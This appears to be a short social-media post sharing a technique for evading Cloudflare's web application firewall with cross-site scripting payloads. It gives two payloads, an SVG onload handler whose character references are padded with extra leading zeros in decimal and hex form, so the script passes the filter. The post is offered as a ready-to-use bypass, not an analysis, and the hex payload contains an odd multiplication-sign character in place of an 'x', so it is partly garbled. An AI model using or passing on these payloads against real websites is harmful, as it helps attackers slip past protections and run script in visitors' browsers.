Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex.

Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23×000000028;document.domain)>

#Bypass #WAF #XSS https://t.co/Cmr8Yxb55Z